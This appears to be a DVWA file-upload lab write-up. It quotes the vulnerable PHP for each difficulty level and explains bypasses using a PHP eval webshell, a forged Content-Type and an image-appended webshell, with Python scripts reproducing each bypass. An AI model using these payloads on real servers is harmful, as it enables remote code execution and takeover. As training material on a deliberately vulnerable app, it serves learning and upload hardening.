Low:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>

A file upload is only exploitable under three conditions: first, the file can actually be uploaded; second, the uploaded file can be executed by the server; third, the upload path is known.

At the Low level there are no checks at all (the destination is simply basename($_FILES['uploaded']['name']) under hackable/uploads/), so upload a PHP one-liner webshell directly.

The response echoes $target_path, so the path is exposed; just connect to it with AntSword (蚁剑).

Medium:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

Medium restricts the file's type and size: the type must be image/jpeg or image/png, and the size must be under 100000 bytes. Note that the type comes from $_FILES['uploaded']['type'], which is just the Content-Type the client sent for that form part, so it is entirely under the uploader's control.

Rename lcx.php to lcx.png, intercept the upload with Burp Suite, and change the filename back to lcx.php while leaving the Content-Type: image/png the browser set for the .png file; the check passes and the file is saved as lcx.php. Then connect with AntSword.

On old PHP builds (before 5.3.4, with magic_quotes_gpc=off) a %00 null-byte truncation of the filename can also be tried.

Of course, that is rarely found nowadays.
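The three preconditions listed under Low and the Medium bypass both come down to which parts of the multipart request the client controls. The following Python script is an added example (not DVWA's code and not the write-up's): it builds the raw multipart/form-data body the upload form sends, parses it back the way PHP fills $_FILES['uploaded'], and transcribes the Low and Medium server-side logic so the bypass can be checked offline. The webshell string, boundary value and field names are constructed for the example and nothing is sent to any server.

```python
import os
import re

# Constructed stand-in for the PHP one-liner webshell used in the write-up.
WEBSHELL = b"<?php @eval($_POST['cmd']); ?>"
UPLOAD_DIR = "hackable/uploads/"              # DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"
BOUNDARY = "----WebKitFormBoundaryDVWA0001"   # assumed browser-chosen boundary


def build_upload_body(filename: str, content_type: str, data: bytes,
                      boundary: str = BOUNDARY) -> bytes:
    """Raw multipart/form-data body as DVWA's form would send it.

    The file part uses the field name 'uploaded' ($_FILES['uploaded']); the
    submit button 'Upload' is included so isset($_POST['Upload']) holds.
    Both filename and Content-Type are whatever the client chooses to write.
    """
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="uploaded"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n").encode()
    submit = (f"--{boundary}\r\n"
              'Content-Disposition: form-data; name="Upload"\r\n\r\n'
              "Upload\r\n").encode()
    tail = f"--{boundary}--\r\n".encode()
    return head + data + b"\r\n" + submit + tail


def parse_file_part(body: bytes, boundary: str = BOUNDARY) -> dict:
    """Recover what PHP puts in $_FILES['uploaded'] from the request body.

    'name' and 'type' are copied straight from the client's headers, exactly
    as PHP does, which is why neither can be trusted; 'size' is measured.
    """
    delim = f"--{boundary}".encode()
    for part in body.split(delim)[1:-1]:
        headers, _, data = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        m = re.search(rb'name="uploaded"; filename="([^"]*)"', headers)
        if not m:
            continue
        ctype = re.search(rb"Content-Type: ([^\r\n]+)", headers)
        data = data[:-2] if data.endswith(b"\r\n") else data
        return {"name": m.group(1).decode(),
                "type": ctype.group(1).decode() if ctype else "",
                "size": len(data), "data": data}
    raise ValueError("no 'uploaded' file part in body")


def target_path(f: dict) -> str:
    """Low and Medium both save under basename() of the client's filename."""
    return UPLOAD_DIR + os.path.basename(f["name"])


def medium_accepts(f: dict) -> bool:
    """Medium's check transcribed: trusts the client-supplied MIME type and the size."""
    return f["type"] in ("image/jpeg", "image/png") and f["size"] < 100000


if __name__ == "__main__":
    # Low: no check, lcx.php lands in the upload directory under its own name.
    low = parse_file_part(build_upload_body("lcx.php", "application/x-php", WEBSHELL))
    print(target_path(low))

    # Medium: keep the .php filename but present it as image/png, which is what
    # editing the intercepted request in Burp amounts to.
    honest = parse_file_part(build_upload_body("lcx.php", "application/x-php", WEBSHELL))
    forged = parse_file_part(build_upload_body("lcx.php", "image/png", WEBSHELL))
    print(medium_accepts(honest), medium_accepts(forged), target_path(forged))
```

The forged request is accepted by the Medium check and still saved as lcx.php, because the saved path is built from the filename while the type check looks only at the Content-Type header.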

High:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

The familiar strrpos(string, find, start) function: it returns the position of the last occurrence of find in string, with start as the position to begin searching from.

getimagesize() returns the image's dimensions and related information as an array on success, and FALSE on failure. It only inspects the image header, so it says nothing about what comes after the image data.

Roughly: the extension (everything after the last '.', lower-cased) must be one of .jpg, .jpeg or .png, the size must be under 100000 bytes, and the content must parse as an image.

The old trick: use copy to build an image webshell (图片马), e.g. copy /b 1.png + lcx.php lcx.png, so the file keeps a genuine image header with the PHP appended after it.

Upload it, then connect with AntSword to get a shell. One caveat: the file is stored with a .png extension, so the web server will not execute it on its own; in DVWA it is normally executed by including it through the File Inclusion module.
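To show exactly why the image webshell gets through the High check, here is an added example (not DVWA's code and not the write-up's) in Python: it generates a complete, valid PNG from scratch, appends a constructed PHP payload the way copy /b does, and transcribes the three High-level checks, with a small header sniffer standing in for getimagesize(). The payload string and the filenames are assumptions for the example.

```python
import struct
import zlib

# Constructed PHP payload appended after the image bytes.
PHP_PAYLOAD = b"<?php @eval($_POST['cmd']); ?>"
ALLOWED_EXT = ("jpg", "jpeg", "png")
MAX_SIZE = 100000


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """One PNG chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def minimal_png(width: int = 1, height: int = 1) -> bytes:
    """A complete, valid 8-bit RGB PNG of one solid colour (no external file needed)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    scanlines = b"".join(b"\x00" + b"\xff\x00\x00" * width for _ in range(height))
    return (b"\x89PNG\r\n\x1a\n"
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(scanlines))
            + png_chunk(b"IEND", b""))


def make_image_shell(image: bytes, payload: bytes = PHP_PAYLOAD) -> bytes:
    """Exactly what `copy /b image.png + shell.php out.png` does: concatenation."""
    return image + payload


def sniff_image_size(data: bytes):
    """Stand-in for getimagesize(): (width, height) for a PNG/GIF/JPEG header, else None.
    Like PHP it reads only the header, so bytes appended after the image are never seen."""
    if data[:8] == b"\x89PNG\r\n\x1a\n" and data[12:16] == b"IHDR":
        return struct.unpack(">II", data[16:24])
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return struct.unpack("<HH", data[6:10])
    if data[:3] == b"\xff\xd8\xff":
        return (0, 0)   # simplified: a real JPEG's size sits in its SOF marker
    return None


def php_ext(filename: str) -> str:
    """substr($name, strrpos($name, '.') + 1). strrpos() returns false when there is
    no dot, and false + 1 == 1 in PHP, so a dotless name just loses its first character."""
    pos = filename.rfind(".")
    return filename[(pos if pos >= 0 else 0) + 1:]


def high_accepts(filename: str, data: bytes) -> bool:
    """DVWA High check transcribed: extension allow-list, size limit, image header."""
    return (php_ext(filename).lower() in ALLOWED_EXT
            and len(data) < MAX_SIZE
            and sniff_image_size(data) is not None)


if __name__ == "__main__":
    shell_png = make_image_shell(minimal_png())
    print(high_accepts("lcx.png", shell_png))    # passes all three checks
    print(high_accepts("lcx.php", shell_png))    # blocked by the extension check
    print(high_accepts("lcx.png", PHP_PAYLOAD))  # blocked: no image header
    print(PHP_PAYLOAD in shell_png)              # payload survives untouched
```

Nothing in the check ever looks past the image header, so the appended PHP is untouched; what the High level does enforce is the .png extension, which is why the stored file needs a second vector (file inclusion) before the payload runs.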

Impossible:

At this level the uploaded file is renamed first (the stored name is derived from md5(uniqid() . original name), keeping only an allow-listed extension), the image is re-encoded through GD so anything appended after the image data is discarded, and the upload path is no longer shown after upload.
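To make the Impossible-level design concrete, here is an added example (not DVWA's code) of a hardened save routine in Python: the extension comes from an allow-list, the on-disk name is server-chosen and random, the client's directory components are ignored, and the response is a fixed message rather than the path. The directory, the sample header bytes and the message text are assumptions for the example.

```python
import hashlib
import os
import secrets
import tempfile

ALLOWED_EXT = ("jpg", "jpeg", "png")
MAX_SIZE = 100000
# Fixed response: like DVWA's Impossible level, nothing about the path is echoed.
OK_MESSAGE = "Your image was uploaded."


def server_side_name(original_name: str) -> str:
    """Server-chosen filename: random token hashed with the original name (DVWA uses
    md5(uniqid() . $uploaded_name)); only the extension is kept, and only if allow-listed."""
    ext = original_name.rsplit(".", 1)[-1].lower() if "." in original_name else ""
    if ext not in ALLOWED_EXT:
        raise ValueError("We can only accept JPEG or PNG images.")
    digest = hashlib.md5((secrets.token_hex(16) + original_name).encode()).hexdigest()
    return digest + "." + ext


def hardened_save(original_name: str, data: bytes, upload_dir: str) -> str:
    """Write the upload under a server-chosen name and return only the fixed message.

    Traversal sequences in the client name are irrelevant: only its extension is
    ever used, and the directory is fixed by the server.
    """
    if len(data) >= MAX_SIZE:
        raise ValueError("file too large")
    with open(os.path.join(upload_dir, server_side_name(original_name)), "wb") as fh:
        fh.write(data)
    return OK_MESSAGE


def demo(upload_dir: str = None) -> dict:
    """Upload the same client filename twice, try a .php, and report what landed on disk."""
    upload_dir = upload_dir or tempfile.mkdtemp()
    fake_png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # constructed header-only stand-in
    msg1 = hardened_save("../../lcx.png", fake_png, upload_dir)
    msg2 = hardened_save("../../lcx.png", fake_png, upload_dir)
    php_rejected = False
    try:
        hardened_save("lcx.php", fake_png, upload_dir)
    except ValueError:
        php_rejected = True
    return {"messages": (msg1, msg2),
            "php_rejected": php_rejected,
            "stored": sorted(os.listdir(upload_dir))}


if __name__ == "__main__":
    print(demo())
```

Two uploads of the same name produce two unrelated stored names, neither of which the client can predict or learn from the response. DVWA's Impossible level additionally decodes and re-encodes the image with GD (imagecreatefrompng/imagepng and the JPEG equivalents), which throws away any payload appended after the image data; in Python that step would need Pillow, so it is left out here to keep the example standard-library only.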
